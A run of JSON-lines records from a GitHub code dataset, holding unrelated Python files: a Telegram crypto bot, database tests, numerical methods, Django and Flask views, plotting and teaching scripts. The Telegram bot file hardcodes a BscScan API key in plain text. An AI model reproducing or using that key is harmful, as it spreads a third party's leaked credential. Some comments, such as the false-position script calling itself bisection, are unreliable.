update.message.reply_text(response)\n\ndef error(update, context):\n print(f\"Update {update} caused error {context.error}\")\n\n\ndef main():\n updater = Updater(token, use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n dp.add_handler(CommandHandler(\"help\", help_command))\n\n dp.add_handler(MessageHandler(Filters.text, handle_message))\n\n dp.add_error_handler(error)\n\n updater.start_polling()\n updater.idle()\n\ndef details(address):\n API_KEY = \"D3XPR53MHTF8YI3W71YHI923V9MC4HW4XM\"\n\n url = f'https://api.bscscan.com/api?module=account&action=tokentx&address={address}&startblock=0&endblock=99999999&sort=desc&apikey={API_KEY}'\n response = requests.get(url)\n data = json.loads(response.text)\n all_details = \"\"\n # Check for new transactions\n for tx in islice(data['result'], 10):\n if tx['to'] == address:\n BASE_CONVERT_RATE = 10 ** 18\n value = int(tx['value']) / BASE_CONVERT_RATE\n token_name = tx['tokenName']\n timestamp = int(tx['timeStamp'])\n\n # convert timestamp to datetime object\n date_time = datetime.fromtimestamp(timestamp)\n\n # print the date\n token_date = str(date_time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n details = f'Token: {token_name}\\nValue: {value}\\nDate received: {token_date}'\n all_details += \"Transaction details!\\n\" + details + \"\\n\\n\"\n # Send message to Telegram user\n # bot.send_message(chat_id=chat_id, text=all_details)\n return all_details\n\nif __name__ == '__main__':\n print(\"Bot started...\")\n main()\n","repo_name":"AustinChris1/crypto-telegram-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14436539407","text":"import sys\nimport unittest\nsys.path.append(sys.path[0]+\"/../\")\nfrom yat.test import macro\nfrom yat.test import Node\nfrom testcase.utils.Logger import Logger\nfrom testcase.utils.Constant import Constant\nfrom testcase.utils.CommonSH import CommonSH\n\n\nlogger = Logger()\ncommonsh = CommonSH('PrimaryDbUser')\nconstant = Constant()\n\nclass GUC_SC(unittest.TestCase):\n def setUp(self):\n logger.info('------------------------Opengauss_Function_Guc_Synchronous_Commit_Case0006开始执行-----------------------------')\n self.userNode = Node('PrimaryDbUser')\n self.DB_ENV_PATH = macro.DB_ENV_PATH\n self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH\n self.sh_primy = CommonSH('PrimaryDbUser')\n self.Constant = Constant()\n\n def test_synchronous_commit(self):\n # 查看参数默认值(off)且创建系统管理员和数据库\n sql_cmd1 = commonsh.execut_db_sql(f'''show synchronous_commit;\n drop user if exists test1_sys006 cascade;\n create user test1_sys006 with sysadmin password '{macro.COMMON_PASSWD}';\n drop database if exists testdb_006;\n create database testdb_006;''')\n logger.info(sql_cmd1)\n flag = (constant.SYNCHRONOUS_COMMIT_DEFAULT[0] in sql_cmd1 or constant.SYNCHRONOUS_COMMIT_DEFAULT[1] in sql_cmd1)\n self.assertTrue(flag)\n self.assertIn(constant.CREATE_ROLE_SUCCESS_MSG, sql_cmd1)\n self.assertIn(constant.CREATE_DATABASE_SUCCESS, sql_cmd1)\n # 系统管理员使用alter database命令修改参数为2;修改成功,未退出会话,查看参数值,未生效\n sql_cmd2 = ('''alter database testdb_006 set synchronous_commit to 2;\n show synchronous_commit;''')\n excute_cmd1 = f'''\n source {self.DB_ENV_PATH};\n gsql -d testdb_006 -p {self.userNode.db_port} -U test1_sys006 -W '{macro.COMMON_PASSWD}' -c \"{sql_cmd2}\"\n '''\n logger.info(excute_cmd1)\n msg1 = self.userNode.sh(excute_cmd1).result()\n logger.info(msg1)\n self.assertIn(constant.ALTER_DATABASE_SUCCESS_MSG, msg1)\n flag = (constant.SYNCHRONOUS_COMMIT_DEFAULT[0] in msg1 or constant.SYNCHRONOUS_COMMIT_DEFAULT[1] in msg1)\n self.assertTrue(flag)\n # 重新连接数据库,查看参数值,参数值生效,为remote_apply\n sql_cmd4 = (''' show synchronous_commit;''')\n excute_cmd1 = f'''\n source {self.DB_ENV_PATH};\n gsql -d testdb_006 -p {self.userNode.db_port} -c \"{sql_cmd4}\"\n '''\n logger.info(excute_cmd1)\n msg1 = self.userNode.sh(excute_cmd1).result()\n logger.info(msg1)\n self.assertIn('remote_apply',msg1)\n\n # 清理环境\n def tearDown(self):\n logger.info('----------this is teardown-------')\n # 恢复参数为默认值\n sql_cmd5 = commonsh.execut_db_sql('''ALTER DATABASE testdb_006 RESET synchronous_commit;''')\n logger.info(sql_cmd5)\n # 删除用户\n sql_cmd6 = commonsh.execut_db_sql('''drop user test1_sys006 cascade;\n drop database if exists testdb_006; ''')\n logger.info(sql_cmd6)\n logger.info('------------------------Opengauss_Function_Guc_Synchronous_Commit_Case0006执行结束--------------------------')\n","repo_name":"chezming/opengauss_Yat","sub_path":"openGaussBase/testcase/GUC/WAL/Opengauss_Function_Guc_Synchronous_Commit_Case0006.py","file_name":"Opengauss_Function_Guc_Synchronous_Commit_Case0006.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26845388185","text":"## Bisection Method using Python.\nimport math as mth\n\n# Initialize the function \ndef bisect(f: int, xl: int, xr: int, minimum_error: int, max_iter: int):\n \"\"\"Calculating the root of the given function\n\n Args:\n f (int): The root we're finding\n xl (int): Lower boundary\n xr (int): Higher boundary\n minimum_error (int): Pre-specified tolerance that satisfy the condition\n max_iter (int): Optional\n\n Returns:\n xm: Return the root of the equation\n \"\"\"\n\n # Initalize variables\n i = 1 \n\n # table header\n print(\"{:<4} {:<15} {:<15} {:<15} {:<15} {:<15} {:<15} {:<15}\".format(\n \"i\", \"xl\", \"xr\", \"xm\", \"f(xl)\", \"f(xr)\", \"f(xn)\", \"Relative Approx Error\"\n ))\n\n # Iterate until the max_iter or the relative approx error is satisfied.\n while i <= max_iter:\n # Calculate the midpoint\n xn = (xr * f(xl) - xl * f(xr))/(f(xl) - f(xr))\n\n # calculate the f(xm) to compare the values\n fxn = f(xn)\n\n # Calculate the approx errord\n\n if i > 1:\n ea = abs((xn - x_old) / xn)\n else:\n ea = 100.0 # set it to the high\n\n # print the current values and then update\n print(\"{:<4} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5f} {:<15.5%}\".format(\n i, xl, xr, xn, f(xl), f(xr), fxn, ea\n ))\n\n if fxn == 0 or ea < minimum_error:\n break\n\n\n # Update the boundary \n # Assuming the f(xl) is negative and fxn is positive\n if f(xl) < 0 and fxn > 0:\n xr = xn\n else:\n xl = xn\n\n # update the xm\n x_old = xn\n\n # Increment\n i += 1\n\n return xn\n \n\n\ndef f(x): #Function that we want to solve\n return x**2 - 23\n\n\n# Determine the root of the equation. F(x) = sin5x + cos2x, with minimum 5% approx error.\n# Interval of [-0.525, -0.51875]\n\nxl = 3\nxr = 6\nminimum_error = 0.05\nmax_iter = 50\n\nroot = bisect(f, xl, xr, minimum_error, max_iter)\n\nprint(f\"The root is: {root:.5f}\")\n","repo_name":"javaldrnld/uni","sub_path":"Numerical Code/Python/falseposition.py","file_name":"falseposition.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17078372264","text":"from django.conf.urls import url\nfrom greenhouse_app import views\nurlpatterns = [#url(''),\n url(r'^$', views.index, name='index'),\n url(r'^measurements/getSensorsData/', views.getSensorsData, name='getSensorsData'),\n url(r'^measurements/getLastSensorValues/', views.getLastSensorValues, name='getLastSensorValues'),\n url(r'^measurements/downloadMeasurements/', views.downloadMeasurements, name='downloadMeasurements'),\n url(r'^measurements/', views.measurements, name='measurements'),\n url(r'^relays/getRelaysState/', views.getRelaysState, name='getRelaysState'),\n url(r'^manualMode/reloadConfiguration/', views.reloadConfiguration, name='reloadConfiguration'),\n url(r'^manualMode/runAction/', views.runAction, name='runAction'),\n url(r'^manualMode/setManualMode/', views.setManualMode, name='setManualMode'),\n url(r'^manualMode/', views.manualMode, name='manualMode'),\n url(r'^graphs/getGraphData', views.getGraphData, name='getGraphData'),\n url(r'^graphs/', views.graphs, name='graphs'),\n url(r'^camera/savePicture/', views.savePicture, name='savePicture'),\n url(r'^camera/', views.camera, name='camera'),\n url(r'^setConfiguration/', views.setConfiguration, name='setConfiguration'),\n url(r'^getKeepAlive/', views.getKeepAliveValues, name='getKeepAlive'),\n ]\n\n\n\n\n","repo_name":"netanelf/greenhouse_controller","sub_path":"web/greenhouse_django_project/greenhouse_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19336272091","text":"#!/usr/bin/env python3\n# get_gene_level_information.py\n'''\nGetting data from the Unigene database Links to an external site.\n'''\nimport sys\nimport re\nimport argparse\nfrom config import config\nfrom config import io_utils\n\n\ndef main():\n \"\"\"Business Logic\"\"\"\n\n # get the host and gene name\n args = get_file_args()\n host_name = args.host\n gene_name = args.gene\n\n # standardize the input host name\n updated_host_name = update_host_name(host_name)\n\n # get the full file path\n file = \"/\".join((config.get_directory_for_unigene(),\n updated_host_name, gene_name + \".\" + config.get_extension_for_unigene()))\n\n # check for the existence of file\n if io_utils.is_gene_file_valid(file):\n # using f-strings\n print(f\"\\nFound Gene {gene_name} for {updated_host_name.replace('_', ' ')}\")\n else:\n print(\"Not found\")\n print(f\"Gene {gene_name} does not exist for {updated_host_name}. exiting now...\", file=sys.stderr)\n sys.exit(1)\n\n # get the filehandle\n file_handle = io_utils.get_filehandle(file, \"r\")\n\n # get the data information of target gene\n extracted_tissue_list = get_data_for_gene_file(file_handle)\n\n # print the results\n print_host_to_gene_name_output(updated_host_name, gene_name, extracted_tissue_list)\n\n\ndef update_host_name(host_name) -> str:\n \"\"\"\n This function take the host name and checks for the available conversions \\\n from common to scientific names and return the scientific name\n \"\"\"\n update_name = host_name.lower().replace('_', ' ')\n check_dict = config.get_keywords_for_hosts()\n if update_name in check_dict.keys():\n return check_dict[update_name]\n else:\n _print_directories_for_hosts()\n sys.exit(1)\n\n\ndef get_file_args():\n \"\"\"\n Just get the command line options using argparse\n @return: Instance of argparse arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Give the Host and Gene name')\n\n parser.add_argument('--host',\n dest='host',\n type=str,\n help='Name of Host',\n default='Human')\n\n parser.add_argument('-g', '--gene',\n dest='gene',\n type=str,\n help='Name of Gene',\n default='A1BG')\n\n return parser.parse_args()\n\n\ndef _print_directories_for_hosts():\n \"\"\"\n to alert the user what directories do exist (see outputs below) and the exit the program.\n \"\"\"\n print(f'\\n\\nEither the Host Name you are searching for is not in the database\\\n \\n\\nor If you are trying to use the scientific name please put the name in double quotes:\\\n \\n\\n\"Scientific name\"\\\n \\n\\nHere is a (non-case sensitive) list of available Hosts by scientific name\\n\\\n ')\n check_dict = config.get_keywords_for_hosts()\n set_value = sorted(set(check_dict.values()))\n count_value = 1\n for value in set_value:\n print(f\"{count_value:>3d}. {value}\")\n count_value += 1\n\n print('\\n\\n\\nHere is a (non-case sensitive) list of available Hosts by common name\\n')\n\n count_key = 1\n for value in check_dict:\n print(f\"{count_key:>3d}. {value[0].upper()}{value[1:].lower()}\")\n count_key += 1\n\n\ndef get_data_for_gene_file(file_handle):\n \"\"\"\n extracts the list of tissues in which this gene is expressed and returns a sorted list of the tissues.\n \"\"\"\n for line in file_handle:\n match = re.search('^EXPRESS(.*)', line)\n if match:\n tissue_string = match.group(1)\n tissue_list = tissue_string.lstrip().split('|')\n for tissue in tissue_list:\n index = tissue_list.index(tissue)\n tissue_list[index] = tissue.lstrip().rstrip()\n tissue_list_sorted = sorted(tissue_list)\n\n return tissue_list_sorted\n\n\ndef print_host_to_gene_name_output(host_name, gene_name, data_from_gene_file):\n \"\"\"\n This function should print the tissue expression data for the gene.\n \"\"\"\n updated_host_name = host_name.replace(\"_\", \" \")\n print(f\"In {updated_host_name}, There are {len(data_from_gene_file)} tissues that {gene_name} is expressed in:\\n\")\n count = 1\n for tissue in data_from_gene_file:\n print(f\"{count:>3d}. {tissue[0].upper()}{tissue[1:].lower()}\")\n count += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chenxi-gao/workSample","sub_path":"Bioinformatics_Tool_Suite/get_gene_level_information/get_gene_level_information.py","file_name":"get_gene_level_information.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5337353385","text":"import streamlit as st\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.express as px\r\nfrom matplotlib.patches import Rectangle\r\n\r\n\r\ndef visualization_missingvalue(df):\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n fig, axs = plt.subplots(1, 1, figsize=(10, 7.5))\r\n plt1 = sns.heatmap(nan_data_numerical, annot=True, cmap=colors, ax=axs)\r\n #axs.set_title('Numerical Columns\\n',fontweight = 'bold',fontsize=15)\r\n plt.suptitle('MISSING VALUES \\n PER COLUMN\\n',\r\n fontsize=20, fontweight='bold')\r\n plt.tight_layout()\r\n st.write('\\n')\r\n st.pyplot(fig)\r\n\r\n\r\ndef visualization_comparison(df):\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n data = df.copy()\r\n list_nan_features = list(\r\n nan_data_numerical[nan_data_numerical[0] > 0].index)\r\n for col in list_nan_features:\r\n data[col] = data[col].replace(np.nan, data[col].median())\r\n fig = plt.figure(figsize=(10, 6))\r\n ax = sns.countplot(data['potability'],\r\n order=data['potability'].value_counts().index)\r\n\r\n # Create annotate\r\n for i in ax.patches:\r\n ax.text(x=i.get_x()+i.get_width()/2, y=i.get_height()/7, s=f\"{np.round(i.get_height()/len(data)*100,0)}%\",\r\n ha='center', size=50, weight='bold', rotation=90, color='white')\r\n for p in ax.patches:\r\n ax.annotate(format(p.get_height(), '.0f'),\r\n (p.get_x() + p.get_width() / 2., p.get_height()),\r\n ha='center',\r\n va='center',\r\n xytext=(0, 10),\r\n textcoords='offset points')\r\n\r\n plt.title(\"Comparison of Potable and Not Potable Samples \\n\",\r\n size=15, weight='bold')\r\n plt.annotate(text=\"Not safe water for human consumption\", xytext=(0.5, 1790), xy=(0.2, 1250),\r\n arrowprops=dict(arrowstyle=\"->\", color='blue', connectionstyle=\"angle3,angleA=0,angleB=90\"), color='black')\r\n plt.annotate(text=\"Safe water for human consumption\", xytext=(0.8, 1600), xy=(1.2, 1000),\r\n arrowprops=dict(arrowstyle=\"->\", color='blue', connectionstyle=\"angle3,angleA=0,angleB=90\"), color='black')\r\n\r\n # Setting Plot\r\n sns.despine(right=True, top=True, left=True)\r\n ax.axes.yaxis.set_visible(False)\r\n st.pyplot(fig)\r\n\r\n\r\ndef visualization_distribution(df):\r\n df.columns = df.columns.str.lower().str.replace(' ', '_')\r\n colors = ['#DFF6FF', '#47B5FF', '#256D85', \"#06283D\"]\r\n nan_data_numerical = round(\r\n 100*(df.isna().sum())/(len(df.index)), 2).sort_values(ascending=False).to_frame()\r\n data = df.copy()\r\n list_nan_features = list(\r\n nan_data_numerical[nan_data_numerical[0] > 0].index)\r\n for col in list_nan_features:\r\n data[col] = data[col].replace(np.nan, data[col].median())\r\n\r\n cols = data.columns[0:9].to_list()\r\n min_val = [6.5, 60, 500, 0, 3, 200, 0, 0, 0]\r\n max_val = [8.5, 120, 1000, 4, 250, 400, 10, 80, 5]\r\n limit = pd.DataFrame(data=[min_val, max_val], columns=col)\r\n\r\n fig, ax = plt.subplots(nrows=3, ncols=3, figsize=(\r\n 15, 15), constrained_layout=True)\r\n plt.suptitle(\r\n 'Feature distribution by Potability class and Approved limit', size=20, weight='bold')\r\n ax = ax.flatten()\r\n for x, i in enumerate(cols):\r\n sns.kdeplot(data=data, x=i, hue='potability', ax=ax[x], fill=True, multiple='stack', alpha=0.5,\r\n linewidth=0)\r\n l, k = limit.iloc[:, x]\r\n print(ax[x].add_patch(Rectangle(xy=(l, 0), width=k-l, height=1, alpha=0.5)))\r\n for s in ['left', 'right', 'top', 'bottom']:\r\n ax[x].spines[s].set_visible(False)\r\n print(fig.show())\r\n\r\n # st.pyplot(fig)\r\n","repo_name":"budisumandra/water_potability_prediction","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19402053442","text":"n, l = input().split()\nn = int(n)\nl = int(l)\nscore = input().split()\n\nfor i in range(len(score)):\n score[i] = int(score[i])\n\nfor i in range(l):\n op, a, b = input().split()\n a = int(a)\n b = int(b)\n if op == \"U\":\n score[a-1] = b\n if op == \"Q\":\n if a > b:\n a, b = b, a\n elif a == b:\n print(score[a])\n continue\n\n print(max(score[a - 1:b]))\n","repo_name":"lryself/python_learning","sub_path":"project_demo/huaweiTerm/s2016/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34752640572","text":"# Write a function, connected_components_count, that takes in the adjacency list of an undirected graph. The function should return the number of connected components within the graph.\n\n# input: adj list of undirected graph\n# output: number of connected components within graph\n# create helper function depth_traversal to traverse through graph pass in graph, set and node\n# create comp_num to count components\n# create visited variable to hold set of visited nodes\n# for loop to iterate through nodes of graph\n# if node not in visited set call depth_traversal func then increment comp_num\n# outside for loop return comp_num \n\n# helper function for graph traversal\ndef depth_traversal(graph, visited, node):\n stack = [node]\n\n while stack:\n current = stack.pop()\n\n for neighbor in graph[current]:\n if neighbor not in visited:\n stack.append(neighbor)\n visited.add(neighbor)\n\n# iterative solution\n# time O(e) for each edge travelled\n# space O(n) for creating set and stack which would be 2n\ndef connected_components_count(graph):\n if graph is None:\n return 0\n\n visited = set()\n comp_num = 0\n \n # node is each key of the graph which is essentially each node\n for node in graph:\n if node not in visited:\n visited.add(node)\n depth_traversal(graph, visited, node)\n comp_num += 1\n\n return comp_num\n\nprint(connected_components_count({\n 0: [8, 1, 5],\n 1: [0],\n 5: [0, 8],\n 8: [0, 5],\n 2: [3, 4],\n 3: [2, 4],\n 4: [3, 2]\n})) # -> 2","repo_name":"Jblancs/DSA","sub_path":"structy/matrix/3-connected-components-count.py","file_name":"3-connected-components-count.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13436268194","text":"from flask import Blueprint\n\nfrom server.data_access.follows import get_followees_by_user_id\nfrom server.data_access.equity_order import get_equity_orders_by_user_ids\nfrom server.data_access.user import get_user_info_by_user_ids\nfrom server.constants import OrderType\nfrom server.util.logo import get_logo_url_for_company\nfrom server.util.time import get_time_since_post\n\n\n# Defining a blue print for all URLs that begin with /.\n# All views that are related to portfolio should be registered with\n# this blueprint and this blueprint will in turn be registred\n# with the flask application\nfeed_bp = Blueprint(\"feed_bp\", __name__, url_prefix=\"/feed\")\n\nPAGINATION_SIZE = 25\n\n\n@feed_bp.route(\"/<int:user_id>\")\ndef get_feed_for_user(user_id: int):\n \"\"\"Return the transactions a user should see on their feed\"\"\"\n # Get the list of all users that this user is following and retrieve their\n # user information\n followee_ids = get_followees_by_user_id(user_id)\n user_info = get_user_info_by_user_ids(followee_ids)\n user_id_to_user_info = {user.id: user for user in user_info}\n\n # Get the transactions for the list of followers and format the response\n transactions = get_equity_orders_by_user_ids(followee_ids)\n sorted_transactions = sorted(\n transactions, key=lambda x: x.created_at, reverse=True,\n )\n\n # Pagination:\n # If a list is supposed to have a finite number of entries, we should\n # return all entries. But if at any point, we can have a situation\n # where the number of items returned can be infinite, we should use\n # paging.\n #\n # How can clients request pages?\n # Query strings are commonly used for paging in the following way:\n # /api/sites?page=1&page_size=25\n # You could make an argument for page_size being controlled by the backend\n # but you might also want to give that flexibility to the client\n #\n # Example response with page information:\n # {\n # totalResults: 255,\n # nextPage: \"api/sites?page=5\"\n # prevPage: \"api/sites?page=5\"\n # results: [...]\n # }\n #\n # You can also choose to send the paging details back in the header instead\n # of the body\n return {\n \"transactions\": [\n {\n \"user_id\": transaction.user_id,\n \"firstName\": user_id_to_user_info[transaction.user_id].first_name,\n \"lastName\": user_id_to_user_info[transaction.user_id].last_name,\n \"ticker\": transaction.ticker.ticker,\n \"tickerLogo\": get_logo_url_for_company(transaction.ticker.company_name),\n \"orderType\": OrderType(int(transaction.order_type)).name,\n \"price\": transaction.price,\n \"quantity\": transaction.quantity,\n \"createdAt\": get_time_since_post(transaction.created_at),\n }\n for transaction in sorted_transactions[:PAGINATION_SIZE]\n ],\n \"page\": 1,\n \"count\": len(sorted_transactions[:PAGINATION_SIZE]),\n \"total_items\": len(sorted_transactions),\n }\n","repo_name":"gkeswani92/stock-portfolio","sub_path":"server/views/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2468828845","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom os import makedirs, path, listdir\nfrom random import randint\nfrom skimage import io, transform\nimport json\nimport argparse\nimport sys\n\n\"\"\" Usage:\n To plot a model's scanpath on a given image:\n plot_scanpath.py -dataset <dataset_name> -img <image_name> -model <model_name>\n To plot a (random) human subject's scanpath on a given image:\n plot_scanpath.py -dataset <dataset_name> -img <image_name> -human\n\"\"\"\n\n\"\"\" The main method of this script (plot_scanpath) belongs to https://github.com/cvlab-stonybrook/Scanpath_Prediction/plot_scanpath.py \"\"\"\n\nDATASETS_DIR = '../Datasets'\nRESULTS_DIR = '../Results'\n\ndef plot_scanpath(img, xs, ys, fixation_size, bbox, title, save_path):\n fig, ax = plt.subplots()\n ax.imshow(img, cmap=plt.cm.gray)\n initial_color = 'red'\n scanpath_color = 'yellow'\n\n for i in range(len(xs)):\n if i > 0:\n plt.arrow(xs[i - 1], ys[i - 1], xs[i] - xs[i - 1], ys[i] - ys[i - 1], width=3, color=scanpath_color, alpha=0.5)\n\n for i in range(len(xs)):\n if i == 0:\n face_color = initial_color\n else:\n face_color = scanpath_color\n circle = plt.Circle((xs[i], ys[i]),\n radius=fixation_size[1] // 2,\n edgecolor='red',\n facecolor=face_color,\n alpha=0.5)\n ax.add_patch(circle)\n plt.annotate(\"{}\".format(i + 1), xy=(xs[i], ys[i] + 3), fontsize=10, ha=\"center\", va=\"center\")\n\n # Draw target's bbox\n rect = Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], alpha=0.7, edgecolor='red', facecolor='none', linewidth=2)\n ax.add_patch(rect)\n\n # To draw grid, useful for plotting nnIBS's scanpaths\n # box_size = 32\n # box_x = 0\n # box_y = 0\n # rows = round(img.shape[0] / box_size)\n # columns = round(img.shape[1] / box_size)\n # for row in range(rows):\n # box_y = box_size * row\n # for column in range(columns):\n # box_x = box_size * column\n # rect = Rectangle((box_x, box_y), box_size, box_size, alpha=0.5, edgecolor='yellow', facecolor='none', linewidth=2)\n # ax.add_patch(rect)\n\n\n ax.axis('off')\n ax.set_title(title)\n\n plt.savefig(path.join(save_path, title + '.png'))\n plt.show()\n plt.close()\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-model', type=str, help='Name of the visual search model')\n group.add_argument('-human', nargs='?', const=True, default=False, help='ID of human subject to plot; leave blank to plot a scanpath generated by a random subject (who has found the target)')\n parser.add_argument('-dataset', type=str, help='Name of the dataset')\n parser.add_argument('-img', type=str, help='Name of the image on which to draw the scanpath (write \\'notfound\\' to plot target not found images')\n\n args = parser.parse_args()\n return args\n\ndef get_trial_info(image_name, trials_properties):\n for trial in trials_properties:\n if trial['image'] == image_name:\n return trial \n\n raise NameError('Image name must be in the dataset')\n\ndef rescale_coordinate(value, old_size, new_size, fixation_size=None, is_grid=False):\n if is_grid:\n # Rescale fixation to center of the cell in the grid\n return value * fixation_size + (fixation_size // 2)\n else:\n return (value / old_size) * new_size\n\ndef load_dict_from_json(json_file_path):\n if not path.exists(json_file_path):\n return {}\n else:\n with open(json_file_path, 'r') as json_file:\n return json.load(json_file)\n\ndef process_image(img_scanpath, subject, image_name, dataset_name, trial_info, images_path):\n fixation_size = (img_scanpath['receptive_height'], img_scanpath['receptive_width'])\n scanpath_img_size = (img_scanpath['image_height'], img_scanpath['image_width'])\n\n image_file = path.join(images_path, image_name)\n img = io.imread(image_file)\n img_size_used = scanpath_img_size\n original_img_size = img.shape[:2]\n\n is_grid = False\n # nnIBS uses a grid for images, it's necessary to upscale it\n if 'IBS' in subject:\n is_grid = True\n img_size_used = (768, 1024)\n fixation_size = (img_size_used[0] // scanpath_img_size[0], img_size_used[1] // scanpath_img_size[1])\n\n img = transform.resize(img, img_size_used)\n # Rescale scanpath if necessary\n X = [rescale_coordinate(x, scanpath_img_size[1], img_size_used[1], fixation_size[1], is_grid) for x in img_scanpath['X']]\n Y = [rescale_coordinate(y, scanpath_img_size[0], img_size_used[0], fixation_size[0], is_grid) for y in img_scanpath['Y']]\n\n bbox = img_scanpath['target_bbox']\n\n if is_grid:\n bbox[0], bbox[2] = [rescale_coordinate(pos, original_img_size[0], scanpath_img_size[0], fixation_size[0], is_grid) for pos in (bbox[0], bbox[2])]\n bbox[1], bbox[3] = [rescale_coordinate(pos, original_img_size[1], scanpath_img_size[1], fixation_size[1], is_grid) for pos in (bbox[1], bbox[3])]\n target_height = bbox[2] - bbox[0]\n target_width = bbox[3] - bbox[1]\n bbox = [bbox[1], bbox[0], target_width, target_height]\n\n save_path = path.join('Plots', path.join(dataset_name + '_dataset', image_name[:-4]))\n if not path.exists(save_path):\n makedirs(save_path)\n\n title = image_name[:-4] + '_' + subject.replace(' ', '_')\n\n plot_scanpath(img, X, Y, fixation_size, bbox, title, save_path)\n\nif __name__ == '__main__':\n args = parse_args()\n\n if not args.human:\n scanpaths_dir = path.join(path.join(RESULTS_DIR, args.dataset + '_dataset'), args.model)\n if not path.exists(scanpaths_dir):\n print('There are no results for ' + args.model + ' in the ' + args.dataset + ' dataset')\n sys.exit(0)\n\n scanpaths_file = path.join(scanpaths_dir, 'Scanpaths.json')\n scanpaths = load_dict_from_json(scanpaths_file)\n \n if args.img != 'notfound':\n if not args.img in scanpaths:\n print('Image not found in ' + args.model + ' scanpaths')\n sys.exit(0)\n img_scanpath = scanpaths[args.img]\n subject = args.model\n else:\n human_scanpaths_dir = path.join(path.join(DATASETS_DIR, args.dataset), 'human_scanpaths')\n if not path.exists(human_scanpaths_dir) or not listdir(human_scanpaths_dir):\n print('There are no human subjects scanpaths for this dataset')\n sys.exit(0)\n \n human_scanpaths_files = listdir(human_scanpaths_dir)\n number_of_subjects = len(human_scanpaths_files)\n if isinstance(args.human, str):\n human_subject = int(args.human) - 1\n else:\n human_subject = randint(0, number_of_subjects - 1)\n human_scanpaths_files.sort()\n\n target_found = False\n checked_subjects = []\n while not target_found:\n scanpaths_file = path.join(human_scanpaths_dir, human_scanpaths_files[human_subject])\n scanpaths = load_dict_from_json(scanpaths_file)\n \n if args.img in scanpaths:\n img_scanpath = scanpaths[args.img]\n target_found = img_scanpath['target_found']\n if not target_found:\n checked_subjects.append(human_subject)\n if len(checked_subjects) == number_of_subjects or isinstance(args.human, str):\n print('No successful trial has been found for image ' + args.img)\n sys.exit(0)\n\n human_subject = randint(0, number_of_subjects - 1)\n while human_subject in checked_subjects:\n human_subject = randint(0, number_of_subjects - 1)\n \n subject = 'Human subject ' + human_scanpaths_files[human_subject][4:6]\n \n dataset_path = path.join(DATASETS_DIR, args.dataset)\n dataset_info = load_dict_from_json(path.join(dataset_path, 'dataset_info.json'))\n \n images_path = path.join(dataset_path, dataset_info['images_dir'])\n\n trials_properties_file = path.join(dataset_path, 'trials_properties.json')\n trials_properties = load_dict_from_json(trials_properties_file)\n \n trial_info = get_trial_info(args.img, trials_properties)\n\n if args.img == 'notfound' and not args.human:\n for image_name in scanpaths.keys():\n if not scanpaths[image_name]['target_found']:\n process_image(scanpaths[image_name], subject, image_name, args.dataset, trial_info, images_path)\n else:\n process_image(img_scanpath, subject, args.img, args.dataset, trial_info, images_path)","repo_name":"FerminT/VisualSearchBenchmark","sub_path":"Metrics/plot_scanpath.py","file_name":"plot_scanpath.py","file_ext":"py","file_size_in_byte":8755,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"47565519378","text":"# buscando as palavras \nimport random\n\ndef palavras():\n #buscando o txt com as palavras \n with open('palavra.txt','r') as arquivo:\n palavras = []\n for palavra in arquivo:\n palavras.append(palavra.strip().lower())\n\n #gerando a palavra escolhida de forma aleatoria\n numero_aleatorio = random.randrange(0,len(palavras))\n palavra_escolhida = palavras[numero_aleatorio]\n return palavra_escolhida\n \n","repo_name":"wallacegoulart/Jogos-de-Pyhton","sub_path":"forca/palavras.py","file_name":"palavras.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30410878351","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Quizz 1\n\n# In[1]:\n\n\nfrom jupyterquiz import display_quiz\n\nquizz =[{\n 